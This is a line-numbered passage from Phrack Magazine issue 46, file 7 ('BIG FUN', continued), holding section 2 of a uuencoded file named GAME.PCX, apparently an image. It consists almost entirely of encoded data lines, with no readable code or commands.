  5788. MP?_!^'C"\\'WP>!_P?X`P?`!P>`'P<##?'@@P?!#P?^!AC!PP>'!X\+AP?_!\
  5789. MX<'CCGPXP?_"^'G!_''!\<''P>._/SC!_\+CP<_!^#_!^<'^><'_P?C!_SC!`
  5790. M_,'C@#C!_\'QP?@CP<___^#_U?_!\\?_P>?,_\'XPO_!\\'PP?_!\,'_P?#"F
  5791. M_L+\0<'P8\'_P>!_P>#"\$/!\<'AP?_!\<'CP<XP>,'_P?AP>'#"\,'AP</!K
  5792. M_[^XP?C!\\'CP<_!_X_!^,'\>,'_P?C!_'C!_,'AP=O!^,'^P?'!_\'CP<__G
  5793. M_^#_U?_!\]3_P?G#_\'QP?_!_,'_P?C"_\'^P?_!\<'X<\'_P?!_P>#!^,'P$
  5794. M?\'QP>'!_\'QP>/!_F!X?\'X<'APP?!AP>#!P\)^>,'XP?/!X\'OP?]_POAX1
  5795. MP?_!^,'\>,'XP>/!_\'XP?S!\<'_P?/![___X/_N_\'QU?_!\<+_P<#!_'_!(
  5796. M_@!^`<'X`\'@`\'?/SP!P?/!X\'#P<`_P?QP>,'_P?S"<'C!X\''G'AQPO/!U
  5797. MS___X/_N_\'SU?_!^<+_P<_!_W_!_P_!_P?!_P_!\`^?'QX#P>?!Q\'#@!_!2
  5798. M_@#!^<'_P?X`>!/!QX<>',+SP<./___@____Q?_!_G_/_X_"_\+/?\'_#\/_N
  5799. M!\'^!\'GP<0?!\'\?`^//___W____\;_?\__P=_&_X_#_X_!_P_"YQ^'PO["_
  5800. M#S___]_____D_\'GQ?^_'___X/___^3_P>/&_S___^#____D_\'C___G____5
  5801. MY/_!]\;_?___X/_________-_________\W_________S?_________-____U
  5802.  
  5803. sum -r/size 20457/59873 section (from "begin" to last encoded line)
  5804.  
  5805.                               ==Phrack Magazine==
  5806.  
  5807.                  Volume Five, Issue Forty-Six, File 7 of 28
  5808.  
  5809. ****************************************************************************
  5810.  
  5811.                                 BIG FUN
  5812.                                 (cont)
  5813.  
  5814.  
  5815. section 2 of uuencode 4.13 of file GAME.PCX    by R.E.M.
  5816.  
  5817. M_____\W_________S?_________-_________\W_________S?_________-R
  5818. M_________\W_________S?_________-_________\W_________S?______D
  5819. M___-_________\W_________S?_________-_________\W_________S?__R
  5820. M_______-_________\W_________S?_________-_________\W_________>
  5821. MS?_________-_________\W_________S?_________-_________\W_____R
  5822. M____S?_________-_________\W_________S?_________-_________\W_R
  5823. M________S?_________-_________\W_________S?_________-________]
  5824. M_\W_________S?_________-_________\W_________S?_________-____R
  5825. M_____\W_________S?_________-_________\W_________S?_________-R
  5826. M_________\W_________S?_________-_________\W_________S?______D
  5827. M___-_________\W_________S?_________-_________\W_________S?__R
  5828. M_______-_________\W_________S?_________-_________\W_________>
  5829. MS?_________-_________\W_________S?_________-_________\W_____R
  5830. M____S?_________-_________\W_________S?_________-_________\W_R
  5831. M________S?_________-_________\W_________S?_________-________]
  5832. M_\W_________S?_________-_________\W_________S?_________-____R
  5833. M_____\W_________S?_________-_________\W_________S?_________-R
  5834. M_________\W_________S?_________-_________\W_________S?______D
  5835. M___-_________\W_________S?_________-_________\W_________S?__R
  5836. M_______-_________\W_________S?_________-_________\W_________>
  5837. MS?_________-_\W_P?S!\<'SP?_!^______Z_\W_P?QPP?#!^,'PP?G!^,'[5
  5838. M___)_\']___M_\W_P?S"0,L`0&!QPOO_____[/_._Q^.P@;"`L0``L(``@`"/
  5839. M!@<>#AX.'A^?O\'?P?_!W______A_]3_O\'_G\'_P=_%#PX&PP[#!@0&#L,&\
  5840. M!\(&#@<.!L</'Y\?G______._]G_P=_"_\'?PH_&#\,'!L('!@?(!@<&!P;#0
  5841. M!\,/PH^?C______)_^[_OX^?P?^_G\0/!@0`!L(`!,0`!``$P@8$!L('G\*_8
  5842. M___\__C_P?W!\<'PP?W!\,'@8,'@QR``(,,`PB!@P>'!\<'APOG___?_SO_!_
  5843. M\\3_P?'R_\'QQO#$8$#$8,'@P?#!X,;PP_'!^?__Z/_-_\'\<<'_P?G!_'?!\
  5844. M\/C_P?C#\,)P8'#+8,-PQ/#!^,+YP?C!^<+_P?W__]W_S?_!_&'!_\+X0X#^W
  5845. M_\+[P?G!\,'[P?#!X,'PPF##0,D`0,(`0&#!P$!@<<'QP?#!^<'[___6_\W_B
  5846. MP?[!\Y_"^`<?___'_\'?P?_#WY_"'\(.P@;"`LD`Q`('!@?"#Q___]#_S?_![
  5847. M_G\?P>Q_P?\?___4_\*/Q`_##L0&Q03$!@[&#Q_"#\(?#\*?PO_!W_O_S?_!8
  5848. M_K<?P>=GP?\?___9_X_!W\./Q`_$!\(&!\(&!P8'Q`;#!P;#!\</PH_"_\'/(
  5849. M\O_-_\'\!S_!YG/!_P?__^?_O\+_G\(/CP8.PP3"``8$RP#"!``//P\?GQ^?`
  5850. MP?^/Z?_-_\'\`[_!X''!_X'___#_P?W!Y<'YPO'!_\+QP?##X&#%(,0`QB!@K
  5851. MPB!QP>#!^<'PP?'"_\+]W__-_\'\PO_!X''!^\'S_____\+_P?G!\,'_P?')!
  5852. M\,'@Q6#"0&!`Q&!PQO#"^=+_S?_!_,+_P>!PP?'_____T?_!_<'YP?W!^<'X)
  5853. MPO#"<,'P<,9@<,1@PG#!\,'SSO_-_\'\P?\_P<!PP?$______];_P?O!^<'[,
  5854. MP?C!\,'SP?!@PD``8$#&``/._\W_P?[!_P(?G@<&?___\/_!S\'_'\+_'Y_N,
  5855. M_Y\?#\[_S_\&'YX/!G____#_P<_!_@_!_\'F'P_$_Q_!_P_X_\__P=_"_Y^/<
  5856. M___Q_\'/P?X'P>_!YAX/P?_"'SX/P?X/P>?!]\'''_3______\;_P<_!_:?!&
  5857. MX<'\/#_!_\(?.`?!_`S!X\'SP<0_]/______QO_![\'YP?'!X,+\PO\?#WG!0
  5858. MY\'\?,+AP>?U_______'_\'YP?'!X,'\P?C!_\'^7H;!\<'SP?Y\P?'!X?;_V
  5859. M_____\?_POC!X,'\P?A_P?S!]C!YP?'!_GS!\,'@P?#U_______'_\+YP>#!C
  5860. M_,'X#\'\P<<P><'SP?]\P>#!P<'`?_3______\;_P<_!_<'Y@'[!_!_!_@<8C
  5861. M.\+_/D0#P<)_]/______QO^/P?W!_X`^PO_!_`<<.\'OP?\^#@^/?_3_____8
  5862. M_\;_C\'_AX\_P?^?P?X''A_!Q\'_/@8/C_7______\;_P=_!_`>?/L'\G\']P
  5863. MP><^.8?!_S[![A./]?______Q__!^"?!_\']P?PCP?G!\<'^>"?!_WS!]SG!R
  5864. MX/7______\?_P?S#_\'\P?/"^\'^P?A_P?_!_,'_P?G!X'_T_______6_\'X5
  5865. M]?_________-_______&_\'?___&_______&_X___\;______\;_P<___\;_\
  5866. M_____\;_P=___\;_________S?_________-_________\W_________S?__P
  5867. M____QO_!W___QO______QO_!W___QO______QO_!S___QO______QO_!W___6
  5868. MQO_________-_________\W_________S?_________-_______&_\'?___&^
  5869. M_______&_Y___\;______\;_C___QO______QO_!W___QO_________-____)
  5870. M_____\W_________S?_________-_______&_\'?___&_______&_X___\;_G
  5871. M_____\;_G___QO______QO_!W___QO_________-_________\W_________H
  5872. MS?______QO_!W___QO______QO^?___&_______&_Y___\;______\;_G___Y
  5873. MQO______QO^?___&_________\W_________S?_________-_______&_\'?Q
  5874. M___&_______&_Y___\;______\;_G___QO______QO^?___&_______&_Y__1
  5875. M_\;_________S?_________-_________\W______\;_P=___\;______\;_.
  5876. MG___QO______QO^?___&_______&_Y___\;______\;_G___QO_________-A
  5877. M_________\W_________S?______QO_!W___QO______QO^?___&_______&:
  5878. M_Y___\;______\;_G___QO______QO^?___&_________\W_________S?__+
  5879. M_______-_______&_\'?___&_______&_Y___\;______\;_G___QO______"
  5880. MQO^?___&_______&_Y___\;_________S?_________-_________\W_____]
  5881. M_\;_P=___\;______\;_G___QO______QO^?___&_______&_Y___\;_____*
  5882. M_\;_G___QO_________-_________\W_________S?______QO_!W___QO__\
  5883. M____QO^?___&_\[_P@\?G___\_^?___&_\[_#P?##\*/OY^____M_Y___\;_7
  5884. MS?_!_@;"!`##!,,`Q00&PP^/Q+___]__G___QO_-_\']P>'!\<'PQ6#,(&#"#
  5885. MX,'QPOG#\<+_POW_____W?_;_\'YP?O!\<?PQ.#!\,'@RF#"X,-@P^##\,'Q]
  5886. MP?#!^,'QP?#!\?_____&_]O_P?W#_\']P?C!_,+XP_#!\<'PP?C"\'#!\,5P!
  5887. MPF!PQV#$<,;PP?C!_\']_____\+_^/_!^\'YPOC!\<'YP_!@Q4#%`,5`8,'P6
  5888. MP?G___?__/_!W\+_PM^?PA\>#L(&`@##`@`"`,,"!A^?P=\?G^O_G___QO__<
  5889. M_\S_P=_"_Y^_GQ\/#@;##L4&!\</PA^?P?^_VO^?___&____T_^_C\0/Q`<&!
  5890. M!\(&!P;#!\4/C\+?O];_G___QO___]__O\'_OY\/'X8$#L0`!``$P@8'P@_"(
  5891. MG\._S/^?___&____Y?_!_<'YP?S#8,L@Q&##\<'YP?W__\W____P_\+PP?'![
  5892. M^<7PP>#"8$!@0,9@`,)@<,+@QO#!^<'PP?'!^_;____T_\'YP_C#\,1PS&#"Y
  5893. M<&#$<,3PPOC!\,'XP?GP_______#_\/[P?_!^\/YP?O!^,'P<,'@PF!``$#*-
  5894. M`,)`PV#!\,/YY/______T/_"WY["'P[#!@(&S0(&PP\?G\+_P=_;_______?>
  5895. M_\.?'\0/#LH&R0\?G\_______^;_CY_%#\8'!L@'#Q_._______S_\./!\(&:
  5896. MP@3"``_._______Y_\']P?G!X<'PS__________-_________\W_________\
  5897. MS?_________-_________\W_________S?_________-_________\W_SO_#:
  5898. M\/_____[_\[_P?!@<'______^O_._\'@P?#!X$?_____^O_._\'/PM^'____Q
  5899. M__K_SO_!S\+_P>______^O_._\'/PO_!Y______Z_\[_P<_"_\'G______K_Q
  5900. MSO_![\+_P>?_____^O_._\'OPO_!X______Z_]'_P?/$_\']______7_SO_!6
  5901. M[\+_P>?$_\'\?______T_\[_P<_"_\'GPO_!S\'ZP?X#P?[!_Q_!_\'WP?\&&
  5902. M'XX/P?_!_@_!_Q______Y?_._\'/PO_![\+_P<_!]L'\!\+_'\'_P<?!_P0?&
  5903. M!@_!_\'^!\'^#\'_/\/_C\3_/P_!_\'?O______6_\[_P<_"_\'GPO_"Y\''?
  5904. MCC_!_Q_!_X?!_\(/!P_!_\''!\'^!C\/PN?!_X?!_A_!Q\'_'@8?A@>'#___V
  5905. M___4_\[_P<_"_\'GPO_"X\'#P?PXP?\?P?^#P?X?P@\?P?_!P8'!\`0^'\'AP
  5906. MP>#!_X?!_#_!P\'^/@`?@`>`!\S_P>______Q__._\'OPO_!Y\+_P?#"X\'\V
  5907. M>,'_O\'_P>#!_#_!YP_"_\'CP?C!X<'\/`_!X<'@P?^'P?`_P>#!_SQ]CX#!+
  5908. M_\'`P>'!_\'QRO_!X\+_P>?_____Q/_._\'OPO_!Y\+_P?#"X\'\<,/_P<#!_
  5909. M_'_!X\/_P<?!^,'AP?P\'\'AP?#!_X?!\#_!X,'^>'_!Y\''P?_!P\'QP?_!H
  5910. M\<K_P?/!]\'_P>?1_\'S___Q_]'_P??"_\'X;\'OP?YXP__!\,'\?\'CQ?_!)
  5911. MX\'_?"_!X,'P?B?!\#_!X'QX?\'GPO_![\'PP?_!\,'XPO_!^,'_P?O%_\'GE
  5912. MT__!\\+_P??$_\'WP?_!_,'YQ/_!^___X?_._\'OPO_!Y\+_P?@/P<_!_SC!(
  5913. M_W_!_YC!_C_!SPO"_Y_!_\'#P?\<#\'!P?!^!\'P#\'@?#Q_P>>/P?_!S\'P=
  5914. MP?_!X,'X?\'_P>!_P>'!_<'XP?O"_\''R_\?Q__!P\+_P<?$_P_!_\'\P?G$"
  5915. M_\'S___A_\[_P<_"_\'GPO_!_A_!S\'_&,'_'\'_'CX"#P(?P?\?P?_!Q\'_]
  5916. M#@>!P>`>!\'SC\'"PAY_P>>/P?_!S\'\P?_!P,'X!\'_@!\`P?S"``?!QX?!I
  5917. M_\'/DC\'P?X'P?X/P?X?#\'_P=_%_\'/P?_"C\3_'\'_P?YYQ/_!]___X?_.U
  5918. M_\'/PO_![\+_P?X?C\'_&<'_'\'_'CX$#P`/P?\/P?_!S\'_#@>!P>(>!\'WD
  5919. M#\'''CX_P>>''X_!_,'_P</!YP?!_X</#'S"``>'!\'_CP`_!\'\!\'^#\',%
  5920. M'P^?C\'_C\+_/X_!_\*/Q/\?P?_!_F_1_\'/___4_\[_P<_"_\'GP_\?C\'_8
  5921. M'\'_'\'_#C[##Q_!_P_!_\''P?\.!PO!YQY'P<>/P<>/'C_!QX8/P<_!_L'_O
  5922. MP??"Y\'_AX\>/C]KP>_!QX?!_X\'#PY^#G\'P<</!Q\&?@?!_\'V#P?!_\*'!
  5923. M'\'/PO\/P<_!_GO1_\''RO^_/\__O_?_SO_!S\+_P>?#_S_!S\'_.,'_/\'^3
  5924. M`#[##\+_'\'_P<?!_PXC&<'C'&?!QX?!QXX^?\'G@`_!S\'\P?_!]\'GP?'!2
  5925. M_X_!SCXPP_G!QX_!_X\/'CQ\''&#A\(/'@1X`\'_P?`/!\'_AX`?@'_!_`^%-
  5926. MP?QQP?\_S__![\C_O\'_PC_/_S_W_\[_P>_"_\'GP_\_P>/!_#C!_C_!_``\X
  5927. M/\'/O\+_C\'\P>/!_PQP.<'AB,'CP<`#P>/!X#Q_P>.'P?_!S\'XP?_!\<'G=
  5928. MP?'!_\'GP>`@,,/YP>/!Y\'_P<._/#W!^,'\8<'QP<?![[^<?'C!\<'_P>'!]
  5929. MX\'#P?_!P\'`AX`_P?P/`'AQP>`/PGS!\\'@?\'@PO_!X<__?\'_PC_$_\'QC
  5930. MRO\_P?_!_G_-_\'QYO_1_\'WPO_!_G_!X\'X>,'^?\'X8#Q_P>_#_\'7P?C!I
  5931. MX\'_/'!YP?'!P,'CP<`#P>/!X#A_P>/!W\'_P<?!^,'_P?/!Y\'QPO_!X`!PV
  5932. MP_'!X\+_P</!_\'\<<'XP?Q@P?'!S\+_P?C!_G#!\,'_P>/!\\''P?_!Y\'!1
  5933. MP>>P?\'\/G!XP?'!X,''PGS!\\'`/\'@?\'^8,'XP>S!X\+PPO?!\,'_P?/#P
  5934. M_\'XP?Y_P?_"?\3_P?'*_W_!_,'^S?_!Y\'AP>?"_\'^P?_!^>#_SO_!\,'Y9
  5935. MP?_!]\+_P?Y_PO#!^'A_P?A_?'_!Y\/_P>/!^,'QP?Q\<'C!\<'@P>/!X''!`
  5936. MX\'P/'_!X\+_P>?!^,'_P?'!Y\'YPO_!X'#!^,'YP?C!^<'CPO_!X\'_P?Y@M
  5937. MP?C!_L)@P__!^,'^>,'XP?_!Y\'QP>_!_\'WP>?!YG_"_SQ^>''"X<)XP?'![
  5938. MX,'WP>`_P?XPP?AX<,'P8&'!X\'@?\'@P?AWP?_!\'@_P?P^<,'^P?/!_\'XK
  5939. MP?'!^'Y[P?#"_\'WP?S!_\'X?\'\?\W_P?/!X</_P?Q_P?C@_\[_P<!@<<'GC
  5940. MPO_!_C_!\&#!^'!_P?A_#'_!QP_"_\'!P?#!\<'\/'!YP?'!P<'CC\'SP>/!L
  5941. M\#Q_P<>/P?_!Q\'PP?_!\\'GP?'!_\'/P<1_P?C#^<'CP<_!_\'#/Q_!P'C!Y
  5942. M_F`!P<_!_\'?&,'^.<'XP?_!S\'SP<_!_\+'P>8?/\'_'G\8<<''P>'".,'SM
  5943. MP</!QYX?P?XX<'APP>!`0<'CP<`^`,'P!\'_P>`8#\'\#P!^`<'_P?@!P?`<<
  5944. M`\'@P?_!_@/!\'_!X#_!^'_!_\'[S/_!P\/_P?Q_P?##_Y_<_\[_P<X&`@_#E
  5945. M_S_!_@/!_@!_P?[!_XX_P<<"#\'_P<`#P?@8/CQ[P>/!P\'GC\'SP<?!_,(>*
  5946. M#X_!_\''P=/!_\'SP>?!\\'_P<?!SC_!_,'_P?G!^\''C\'_P<<?#\'^?,'^T
  5947. M(\'?C\'_GQY_&<'XP?_!S\'SP<_!_\''C\'&`A_!_QY_'GF/P>/"','SPH\?$
  5948. MG\'^/SA\P?S!X\'AP?/!QX_"'G"'P?_!QPX?P?\/!CX#P?_!\`/!X@8'@C_![
  5949. M_@/!P`\`'\'\'GX"!\'^'\'_P?(_CW^/P?\?P?_!Q\/_P?Y_P?K#_Y_<_\__5
  5950. MP@\?P_\_P?\/P?\'P_^//\'/``_!_\'N!\'^`GX\?\'GP<?!YP_!_\''P?X^7
  5951. M#A^'#X<'P?_!]\'GP<?!_X>/'S_#_\''C\'_P<\?#\'^/'XGP?^/P<\/'G\?3
  5952. MP?W!_X_!]X_!_\*/P<8&'\'_'G\>>X_!XPP?P<?"CQ^?P?X_','\/&?!X\'OH
  5953. MP<>/'CXSPO_!SX\?P?\?#SP-P?_!XP?!QX?"#Q_!_@F'#PP?P?P>?``'P?0/D
  5954. MP?_!Q!\&'P?!_@_!SP?!S\''P?\.?\'_C\+_']S_U_^?P?_!S\/_P=_!_\'/-
  5955. MCP_"_P_!_P?$_\'GP>^?P?_!Q\'_/@<?@@>&#\'_P??!YP_!_X</#G_#_\'G-
  5956. MA\'_P<<?#Q["/F?!_\*/#QX_'\+_P<_!YX_!_\*/P<<?PO\?/QY[C\'GC@/!B
  5957. MQ\*/'Y_!_S\>P?P&9\'GP>_!QX?!_@XW'\+_CQ_!_\,?P?]_P<?!Y\'_AX\/<
  5958. M'\+_AX_"'\'^'CX"#\''!\'_AP\&'P=^!\''!\'/AC\&/\'^!\'_#X^'V__D7
  5959. M_[_!_[_*_SX%P?^`!\'`#\'_P?#!^`_!_X`?`,+]P?G!_\'GP<?!_\'''PX,-
  5960. M?!QQ@\''CP\>/CG!_<'_PL>/P?_"C\''/\+_'C\<<8_!XX`#P>>/CA^?P?Y_[
  5961. M','P`,'GP?/!\<'G@+P$-`_"_P\_P?_"/SC!_'_!Q\'CP?^''P\?P?_!^8>.*
  5962. MPC_!_C[">,'YP>?!Q\'_C\(/'AQX`\''A\''!#X`?\'\`\'T#Q\`P?_!Y\'OT
  5963. MV/_T_\']P?_!_<+_P?G!_,+_P>#!_\'APOW#_\'CP?_!Y\+_`,'X`,'X`\'@Q
  5964. M+\'''B#"^<'_P>'!X\'OP?_!Y\''P>>_PO\_/CAQP>?!X<+!P?/!S\'F/Y_!/
  5965. M_G\XP?#!\<'APO'!X\'P.`!X`\'_P>`'?\'_/W\P('_!Y\'QP?`#O``_P?[!W
  5966. MX,'GP>Q_/\'\?'C"^,'AP>/!_\'#P?X_B'AQP?'"X\'B/SAX?\'P<,'@P>.<(
  5967. M,'G!X<'CV/_]_\'CQ__!\\3_P>#!^&'!^&/!\'_!X\'^P>#"^<'_P?!'P>_!?
  5968. M_\/GP?!_P?]_?'C!\<'AP>/"P<'SP<_!YL'_P=_!_GYXP?#!^\/QP>/!_#C!F
  5969. M\,']P>'!_\'@!G_!_\)_<$#!_\'CP?'!\$/!_`!_P?@`P>?!Y,'_?\'\PGC"@
  5970. M^,'@P>'!_\'@P?Y_P<!P<<'QP>/!Y\'B?L+X?\'PP?C!X<'CP?S">,'AP>/8U
  5971. M____R__!^<'XP?O"_\'XP__!\<+YP?_!\'_"_\'SP?_!]\'@?\'_?\'P>''!B
  5972. M\,'GP>'!X\'SP>_!Y\'^O\'^?'C!\,'XP_'!X\'_P?C!_\'[P?'!_\'@P>9_#
  5973. MP?_"?W#!\<'_P>/!\<'@P>/!_##!_\'X<,'GP>S!_W_!_'QXPOC!X&'!_\'P[
  5974. M?G_!X'!SP?_!X\'GP>+",,'\?\+XP>'!\<'X?GC!X-G__?_!S\W_P?C+_\'\^
  5975. MP__!]\+_P>##_\'`P?C!\<'P!\+#P?/!S\''@!_!_CAXPOC!X\+QP>.?G,'^S
  5976. MP?/!\<'_AXY_P?\_?S#"_\'CP?'"P\'^/\'_POC![\',?S_!_'QYPOC!P'/!'
  5977. M_\'P/C^``&/!_\'#P<_!Q@`0P?Q_P?C!_$#!XYA^.,'@P<_8__W_P=_-_\'^D
  5978. MUO_!W\+_P?X?P<?!S\'WPL^"'\'^`'S!_`+!Y\+SP<>/PAYSP?/!_X\/'\'_=
  5979. M'S\<PO_!Q\'SA\'#GQ^_P?W!^,'/P<["/\'^/GG!^<'XP<?#_PX?@!_!Y\'_;
  5980. MP<?!S\'.`AG!_G_!_,'^``,>?QX`P<_8____Y_\_P__"WX8?P?X'P?_!_@?!E
  5981. M[\+_P<>.'@Q_!\'_A@\?P?\?/SP?P?_!QX>/!\(/'\']:<*//C_!_CY_POW!<
  5982. MS\+_P=\/'XP_P>?!_\+/C@\=P?Y_P?_!_@(/'G\>!0_8____[?_"G\'_'\+_G
  5983. MC\/_P>_!SS\'P?\/P?_!Q@</P?\//SX'P?_![@?!Q@>/AC_!_@</CPX_P?\>M
  5984. M?\+_P<>'P?^/P@\.'R?"Q\'/CQ^?P?Y_P?_!_@>?#G\>#@_8____[?^?'\'^%
  5985. M/]'_P=_"_X_!_\'^'\'_/\'?P>3!_\'^#\'_P<^`/\'_'GW"_<'P!\'_P<8/"
  5986. M!!X`>`/!Q\+/#QQ\?\+\1\'WGCX>#A_8____[?^`?\'^?];_P?W$_\'YQ?_!7
  5987. MX<+_P?[#^<'P+\'_P>`^`'X`P?@#P>/!Y\'O@#AP?\+PP>'!X[S"?!P_V/__I
  5988. M_^W_P>#K_\'\PO_!\,'^,,'_P?'!^'?!]\+_P>#!_D#!_\'P8,'PP>/!_L'`,
  5989. M?L)\V/___^W_P?#O_\'^?<+_P?S$_\'PP?[!\,'_P?AAP?!_P?[!X,'^PGQ_8
  5990. MU_______WO_!_G_0_\'SV__._\/?_____\W_P?X?[/_-_\'NQ@;##L8/PO^?#
  5991. M___^_S_L_\W_P>\/!\@&!\(&P@?%#\2/O______E_]3_GX\_P?_"CQ\/C,($$
  5992. M`,,$``3%`,($!L($Q08'#Y^/G[_!_[_!_[______SO_<_\'YP?'!X<'@P>'!>
  5993. MX,)@P>!@T2!@(&'!X,)@<</QP?G!_\']_____\C_Z/_!^</_P?G!_\/YQ_#!L
  5994. MX,'P8,'PP>!@P>#)8,+@R/#!\<'S___W__3_P?G#^,'PP?C!\,'XQ/!PP?#%%
  5995. M<,9@<,)@PG#!\'#"\,'XP?G!^___\O_-_\'X^O_!^\/YP?'!^,+P8,-`Q0#"!
  5996. M0&#"0,-@<,'QP_O__^7_S?_!_A^?___!W\*?'Q[&`@#'`L(&#@_!W___Y/_-E
  5997. M_\'^#@_!QC_!_\'/#X8^'___PO_!WY_!_\*?PA_"#\,.Q08.QP\?/Y___];_Z
  5998. MSO\'#\''9\'_P<X'AR<?___+_\*/P@_$!P;&!P\'Q`_"C\+?O___S__._\'FI
  5999. M?L'/P?'!X<'.?X_!YY___]3_PH^?PH_"!\(&P@3$``0`Q`3"!@</#@</'P\'@
  6000. M#[^?OY^_^O_-_\'QP>#!_,'OP?#!X<'L>\'_P>/__]S_P?G!\<'XPN#"(`##"
  6001. M(,<`(,(`PB#"`,(@8"#"8,'PP?'!^<+]]/_-_\'PP>!@P>#!\,'@P>9WP<'!V
  6002. M\/__Y?_"^<?P8,+PP>#!\,'@P?#"8,'@8,'@8,)`8$#&8,+@Q/#!^<']Y__-<
  6003. M_\'P?&#!X'#!X,'^<\'@P?#__^O_P?O!^,'ZP?C!^<3XPO#!^,7PPW#*8,-P-
  6004. MQ?#"^,+YW__-_\'PP?QXP>/!\$#![\'AP<#!^!______PO_$^\'XP?#"^,+P-
  6005. M<,D`PD!@P>#!\,'YP?'!^\'_P?O4_\W_P?O!_C[!S\'V"<'/P<./P?\/___M?
  6006. M_[_9_\'?PO_"WPX&#@;$`L,`PP(&`@8/PA\/'Y_!W\__S_\^P<_!_P_!SW^?B
  6007. MP>^/___M_[_F_Y_$#\0.QP8/SO_/_S_!S\'G#\'/%X_!SX___^W_O\/_P<_C8
  6008. M_Y_"_Y_$C\0/P@<&#\[_T/_!P#^?P<X'A"0/___M_[_!Y#_!_X`\#\/_P?X_C
  6009. MP?\_^/_0_\'@?\'_P?XCP>!P/___[O_!X#_!Y\'@P?!OP?_!_G[!X#_!X#W!]
  6010. M[\'_P>'U_]#_P?O$_\'PP?C__^__P>/"Q\'PP?'!_\'\?GS!\,'_P?!PPN/!S
  6011. MP/7______\?_P??"Y\'SP?'!_\'\PGS!\<'_P?C!\,+CP?#U_______'_\+GD
  6012. MD\'SP?'!_\'\PA[!\\'GP?S!^,+#O_7______\;_/\'OP<<7P??!\C_!_!X.F
  6013. MP??!Q\'^P?O!QX<?]?______QO^_P>_!QQ_!_\'X'\'_C@9OP>?!_L'_P<,'S
  6014. M#_7______\;_O\'OAP?"]Q_!_PX&9\''PO^'P@?U_______&_[_!YX8!P??!T
  6015. M\\'_P?`.<&?!Y\'^P?F,!Q_U_______'_\'@#'G!\\'QP?_!\<'F>,'QP>?!F
  6016. M_,'YP>ASO_7______\?_P>!XP?G!\\'PP?_!\<'D>,'PP?_!_,'PP?AS]O__$
  6017. M____Q__!\,/_P?C!_\'SP?;!_,'P?\'\P?G!_,'SP>#U_______'_\'[R/_!U
  6018. M^,+_P?O!_L'_P<#U_______&_[___\;______\;_O___QO_________-____Q
  6019. M_____\W_________S?_________-_________\W_________S?_________-R
  6020. M_________\W______\;_O___QO_________-_________\W_________S?__[
  6021. M_______-_________\W______\;_O___QO______QO\____&_______&_[__;
  6022. M_\;______\;_?___QO_________-_________\W_________S?_________-=
  6023. M_________\W______\;_?___QO______QO\____&_______&_W___\;_____2
  6024. M_\;_?___QO_________-_______%_\'^?___QO______QO]____&_______&G
  6025. M_S___\;______\;_/___QO______QO]____&_______&_S___\;______\;_P
  6026. M?___QO_________-_______%_\'^___'_______&_W___\;______\;_?___W
  6027. MQO______QO\____&_______&_S___\;______\;_?___QO______Q?_!_G__W
  6028. M_\;_________S?______Q?_!_G___\;______\7_P?Y____&_______&_W__L
  6029. M_\;______\;_?___QO______QO]____&_______&_W___\;______\;_?___P
  6030. MQO______Q?_!_O__Q_______Q?_!_G___\;______\;_?___QO______QO]_L
  6031. M___&_______&_S___\;______\;_/___QO______QO]____&_______&_W__0
  6032. M_\;______\7_P?[__\?______\7_P?Y____&_______%_\'^?___QO______/
  6033. MQ?_!_G___\;______\;_?___QO______QO]____&_______&_W___\;_____S
  6034. M_\7_P?Y_V__!_>G______\7_P?Y_V__!_>G______\7_P?Y_V__!_>G_____D
  6035. M_\7_P?Y____&_______%_\'^?___QO______QO]____&_______&_S___\;_R
  6036. M_____\7_P?Y____&_______&_W___\;______\7_P?[__\?______\7_P?Y_B
  6037. M___&_______%_\'^?___QO______QO]____&_______&_W___\;_S?_!QP?&V
  6038. M#Y_"C[___^S_?___QO_-_\'$!,(`Q`3"!@?"#Q^OP?^____G_W___\;_SO_!O
  6039. M^<'QP?##X,)@P>#,(&`@8,+APO'!^?__V?_!_G___\;_S__!^\+_P?G!_\'XF
  6040. MP?'%\,+@PV#!X,E@P>#'\,'YPO/__\__P?[__\?_W?_!_<3_P_C'\,)PP?!P&
  6041. M8,-P8,5PPO!PPO##^,'PP?G!\,'XP_GZ_\'^___'_^W_P?O!\<'P0,'P8,'@Q
  6042. MPT``0,(`0,(`PD``PD!@PD#"8,+PP?G!^\'XP?K!^<'[___[__G_P=^?PM^?T
  6043. MPA\.Q0;-`L,&#L(?PY_"W\'_G\'?X_]____&____Q/^_P?\?G\,/'\</P@[#7
  6044. M!L(.!@X&#\(.PP\?P@^_WO]____&____U?_"CY^/PP_$!P_&!P_!S\(/C\*?V
  6045. MP=_6_W___\;____>_[_#_[^^!L,$P<3$!`8'P@_"O\+_O\[_P?Y____&____I
  6046. MY__"_<'YP?W!X,H@PF#!_<?_P?W#_\'\?___QO___^S_P?G!\</PQ.#"8$#"=
  6047. M8,'@QO!@P_!PQ/#!\<'[______;_P?C"^<+PP?'%\,9PPF#-<,3PP?C!^<']U
  6048. MP?GM_______-_\'[POG"\,'@<,'P8,-``$#"`$#"`$!P>,'XP?#!^<'[Y?__B
  6049. M____TO_!W\/_PM^?#L(&Q@(>P@+"!@\?GQ_!WY_?_______?_[_#G\0/P@;"0
  6050. M#L(&P@X&QP\?CP\?T?______Y?^?PH_&#\('!L('P@;%!\,//\[_______+_O
  6051. MPK^?P@_"!L($P@`_SO______]?_#_<+YP?#"X,__________S?_________-.
  6052. M_________\W_________S?_________-_________\W_________S?______D
  6053. M___-_________\W_________S?_________-_________\W_________S?__R
  6054. M_______-_________\W_________S?_________-_________\W_________>
  6055. MS?_________-_]3_P?Y_______;_U/_!]G______]O_4_\'@/]'_P??_____]
  6056. MY/_4_\'@?\'YS__!\\'[R/_!^=#_P?W!_\'Y_____\C_U/_!X'_!X,'\PO_!F
  6057. M\'_!\<'PP?_!\,']PO_!^<+_P?')_\'QR/_!_,?_P?S!_\'YQO_!\</_P?/_-
  6058. M__S_U/_!\'_!X'S!_,'_P?!_P>'!\'_!X,'X<<'QP?!^<<'PP?O!^,'_P?C#7
  6059. M_\'^P?_!\,C_P?C&_\+\P?_!^<;_P?'!\\'_PO/$_\'\___W_]3_P>,_P<L<J
  6060. M?,'_P>'!QX/!P`\0<$'!\<'@#`#!P,'SP?`?@'_!^`'!^`/!X,'_P?@/P?_!@
  6061. M\'_!X,'_P>!_PO^/PO_!_'S)_\'CP?_"X\/_/\'^QO_!\\S_P?O!_\'S___A+
  6062. M_]3_CQ^?#S[!_X_!QX\/CSX]P?O!\\'_'L'\P=/!\\''CP8?P?X0P?`#P<#!`
  6063. M_\'X!\'_@A^&/``;PO\'@C_!_!X#P?_!^A_!_P?#_\'#P?_!P\'"'\'^'A_"%
